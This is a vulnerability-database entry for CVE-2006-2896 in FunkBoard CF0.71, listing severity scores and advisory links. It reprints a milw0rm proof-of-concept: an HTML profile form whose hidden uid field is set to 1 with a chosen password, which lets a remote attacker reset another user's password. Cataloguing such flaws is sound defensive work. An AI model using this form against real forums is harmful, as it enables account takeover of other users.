CVE-2006-2896
CVSS 5.0
Published: 2006-06-07 06:02:00
Revised: 2011-03-07 21:37:15

[Original] profile.php in FunkBoard CF0.71 allows remote attackers to change arbitrary passwords via a modified uid hidden form field in an Edit Profile action.


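[CNNVD] FunkBoard CF0.71 profile.php Permissions and Access Control Vulnerability (CNNVD-200606-163)

        profile.php in FunkBoard CF0.71 allows remote attackers to change arbitrary passwords via a hidden form field in an Edit Profile action.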

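- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: NONE [no impact on system confidentiality]
Integrity impact: PARTIAL [may allow system files to be modified]
Availability impact: NONE [no impact on system availability]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

Product and version information (CPE) is not yet available

- OVAL (technical details for detection)

No related OVAL definitions found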

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2896
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2896
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200606-163
(Official data source) CNNVD

- Other links and resources

http://secunia.com/advisories/20433
(VENDOR_ADVISORY)  SECUNIA  20433
http://www.vupen.com/english/advisories/2006/2158
(UNKNOWN)  VUPEN  ADV-2006-2158
http://www.securityfocus.com/archive/1/archive/1/435987/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060605 FunkBoard CF0.71 (profile.php) Remote User Pass Change Exploit
http://milw0rm.com/exploits/1875
(UNKNOWN)  MILW0RM  1875
http://xforce.iss.net/xforce/xfdb/26912
(UNKNOWN)  XF  funkboard-profile-password-modification(26912)
http://www.funkboard.co.uk/forum/thread.php?id=302
(UNKNOWN)  CONFIRM  http://www.funkboard.co.uk/forum/thread.php?id=302
http://securityreason.com/securityalert/1066
(UNKNOWN)  SREASON  1066

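- Vulnerability information

FunkBoard CF0.71 profile.php Permissions and Access Control Vulnerability
Medium severity  Unknown
2006-06-07 00:00:00 2006-06-08 00:00:00
Remote
        profile.php in FunkBoard CF0.71 allows remote attackers to change arbitrary passwords via a hidden form field in an Edit Profile action.

- Advisories and patches

        

- Vulnerability information (1875)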

FunkBoard CF0.71 (profile.php) Remote User Pass Change Exploit (EDBID:1875)
php webapps
2006-06-04 Verified
0 ajann
N/A
<!--
Change action="http://profile.php" under the <form tags> /str0ke
-->

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META http-equiv="Content-Type" content="text/html; charset=utf-8"></head><body><form enctype="multipart/form-data" action="http://profile.php" method="POST" target="_blank" onsubmit="return window.confirm(&quot;You are submitting information to an external page.\nAre you sure?&quot;);">
<table cellspacing="1" cellpadding="2" border="0" width="100%">
<th colspan="4" bgcolor="#003366">
<b><span><font color="#FFbb33">Profile</font></span></b>
</th>

<tr>
  <td bgcolor="#888888" valign="top" width="20%">
   <b>User Name</b>
  </td>
  <td bgcolor="#BBBBBB" colspan="3">

   ajann  </td>
</tr> <tr>
  <td bgcolor="#888888" valign="top" width="20%">
   <b>Membership Number</b>
  </td>
  <td bgcolor="#BBBBBB" colspan="3">
   247  </td>

</tr>
<tr>
  <td bgcolor="#888888" valign="top" width="20%">
   <b>First Registered</b>
  </td>
  <td bgcolor="#BBBBBB" colspan="3">
   Sat 03 Jun 2006 at 09:20:14 pm  </td>
</tr>
<tr>
  <td bgcolor="#888888" valign="top" width="20%">

   <b>Last Login</b>
  </td>
  <td bgcolor="#BBBBBB" colspan="3">
   Sat 03 Jun 2006 at 09:21:45 pm  </td>
</tr>
<tr>
  <td bgcolor="#888888" valign="top" width="20%">
   <b>Number of posts</b>

  </td>
  <td bgcolor="#BBBBBB" colspan="3">
   0  </td>
</tr>

<tr>
  <td bgcolor="#888888" valign="top" width="20%">
   <b>Status</b>
  </td>

  <td bgcolor="#BBBBBB" colspan="3">
   Member  </td>
</tr>

<th colspan="4" bgcolor="#003366">
<b><span><font color="#FFbb33">Entries marked with a * are 
required</font></span></b>
</th>
<tr>
  <td bgcolor="#888888" valign="top" width="20%">
<b>User Name</b> <font color="#ff0000">*</font>

  </td>
  <td bgcolor="#BBBBBB" colspan="3">
<input size="30" name="rname" value="ajann">
  </td>
</tr>
<tr>
  <td bgcolor="#888888" valign="top">
   <b>Your Name</b>  </td>
  <td bgcolor="#BBBBBB" colspan="3">

   <input size="30" name="realname" value="ajann">
  </td>
</tr>
<tr>
  <td bgcolor="#888888" valign="top" width="20%">
<b>Password</b> <font color="#ff0000">*</font>
  </td>
  <td bgcolor="#BBBBBB" colspan="3">
<input type="password" size="30" name="pass" value="8ebOZmF5pe">

  </td>
</tr>
<tr>
  <td bgcolor="#888888" valign="top">
<b>Confirm Password</b> <font color="#ff0000">*</font>
  </td>
  <td bgcolor="#BBBBBB" colspan="3">
<input type="password" size="30" name="cpass" value="8ebOZmF5pe">
  </td>

</tr>
<tr>
  <td bgcolor="#888888" valign="top">
<b>E-mail</b> <font color="#ff0000">*</font>
  </td>
  <td bgcolor="#BBBBBB" colspan="3">
<input size="30" name="fmail" value="">
Hide Email Address?  <input type="radio" name="priv" value="yes">Yes
<input type="radio" name="priv" value="no" checked>No
  </td>

</tr>
<tr>
  <td bgcolor="#888888" valign="top">
Prefered Language  </td>
  <td bgcolor="#BBBBBB" colspan="3">
    <select name="newlang">
       <option value="dutch.flf">dutch</option>       <option value="english.flf" selected>english</option>   </select>
  </td>

</tr>
<tr>
  <td bgcolor="#888888" valign="top">
    Homepage  </td>
  <td bgcolor="#BBBBBB" colspan="3">
   <input size="30" name="www" value="">
  </td>
</tr>
<tr>
  <td bgcolor="#888888" valign="top">

ICQ  </td>
  <td bgcolor="#BBBBBB" colspan="3">
<input size="30" name="icq" value="">
  </td>
<tr>
  <td bgcolor="#888888" valign="top">
AOL Instant Messenger (AIM)  </td>
  <td bgcolor="#BBBBBB" colspan="3">
<input size="30" name="aim" value="">
  </td>

</tr>
<tr>
  <td bgcolor="#888888" valign="top">
Yahoo Instant Messenger (YIM)  </td>
  <td bgcolor="#BBBBBB" colspan="3">
<input size="30" name="yim" value="">
  </td>
</tr>
<tr>
  <td bgcolor="#888888" valign="top">
Location<font color="#ff0000">*</font>  </td>

  <td bgcolor="#BBBBBB" colspan="3">
<input size="30" name="location" value="asdsadasdasd">
  </td>
</tr>
<tr>
  <td bgcolor="#888888" valign="top">
Hobbies/Interests  </td>
  <td bgcolor="#BBBBBB" colspan="3">
<input size="90" name="interebbies" value="">
  </td>
</tr>

<tr>
  <td bgcolor="#888888" valign="top">
Gender (M/F)  </td>
  <td bgcolor="#BBBBBB" colspan="3">
<input size="1" name="sex" value="">
  </td>
</tr>
<tr>
  <td bgcolor="#888888" valign="top">
Date of Birth  </td>

  <td bgcolor="#BBBBBB" colspan="3">
<select name="dobday">
<option selected>1</option>
<option>2</option>
<option>3</option>
<option>4</option>
<option>5</option>
<option>6</option>
<option>7</option>

<option>8</option>
<option>9</option>
<option>10</option>
<option>11</option>
<option>12</option>
<option>13</option>
<option>14</option>
<option>15</option>
<option>16</option>

<option>17</option>
<option>18</option>
<option>19</option>
<option>20</option>
<option>21</option>
<option>22</option>
<option>23</option>
<option>24</option>
<option>25</option>

<option>26</option>
<option>27</option>
<option>28</option>
<option>29</option>
<option>30</option>
<option>31</option>
</select>
<select name="dobmonth">
<option value="1" selected>January</option>
<option value="2">February</option>

<option value="3">March</option>
<option value="4">April</option>
<option value="5">May</option>
<option value="6">June</option>
<option value="7">July</option>
<option value="8">August</option>
<option value="9">September</option>
<option value="10">October</option>
<option value="11">November</option>

<option value="12">December</option>
</select>
<input size="4" name="dobyear" value="">
  </td>
</tr>

<tr>
  <td bgcolor="#888888" valign="top">
Signature (&lt; 100 characters)  </td>
  <td bgcolor="#BBBBBB" colspan="3">

<textarea name="sig" rows="3" cols="35">   </textarea>
  </td>
</tr>
<tr>
  <td bgcolor="#888888" valign="top">
Use an Avatar ?  </td>
  <td bgcolor="#BBBBBB">
Current Avatar - <input type="hidden" name="avatar" value="No Avatar">

No Avatar   
<input type="submit" name="action" value="Select Avatar"></td>

</tr>
<tr>
  <td bgcolor="#888888" valign="top">
Upload Avatar ?<br>(GIF, JPG or PNG only)  </td>
  <td bgcolor="#BBBBBB">
<input type="FILE" name="userfile" size="35">
<input type="hidden" name="MAX_FILE_SIZE" value="5242880">
  </td>
</tr>
<tr>
  <td bgcolor="#888888" valign="top">

<b>Submit</b>
  </td>
  <td bgcolor="#BBBBBB" colspan="3">
<input type="hidden" name="uid" value="1">
<input type="submit" name="action" value="Edit Profile">
  </td>
</tr>
</tr></table></form>

</body></html>

# milw0rm.com [2006-06-04]
		

- Vulnerability information

26181
FunkBoard profile.php uid Hidden Form Field Arbitrary User Password Modification
Remote / Network Access
Exploit Public

- Vulnerability description

Unknown or Incomplete

- Timeline

2006-06-04 Unknown
2006-06-04 Unknown

- Solution

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete
 

 
